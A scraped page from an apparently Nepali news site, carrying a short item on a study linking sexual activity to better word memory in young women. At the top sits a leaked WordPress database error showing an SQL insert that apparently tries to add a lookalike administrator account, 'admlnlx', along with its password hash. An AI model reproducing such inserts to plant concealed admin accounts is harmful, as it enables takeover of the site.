WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCiN9GSlrNy2wkCHHBzqWBgm1jNy1y1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 14:33:06', '', 'admlnlx', 'admlnlx')
अध्ययनका अनुसार एक स्वस्थ्य जवान युवतीको स्मरण शक्तिलाई राम्रो बनाउन सहयोग गर्छ । यसअघि पशुहरुमा यौनको असकका बारेमा अध्ययन गरिएको थियो ।
यसपछि रिसर्च टीमले विश्वविद्यालयमा अध्ययनरत युवतीहरुमा यसको प्रयोग गरेको हो । यसका साथै १८ देखि २९ वर्ष उमेर समूहका ७८ महिलालाई शब्द तथा अनुहारमा आधारित एक कम्प्युटर कार्यक्रममा सामेल गरिएको थियो ।
जर्नल आर्काइव्स अफ सेक्सुअल बिहेवियरमा छापिएको नतिजा अनुसार शब्दको याद गर्ने क्षमतामा अधिक यौन सम्पर्कको सकारात्मक असर देखिएको थियो । अध्ययनका अनुसार महिलामा अधिक यौन हिप्पोकम्पस (दिमागको एक हिस्सा) मा नयाँ तरंग बनेको छ ।
एजेन्सीको सहयोगमा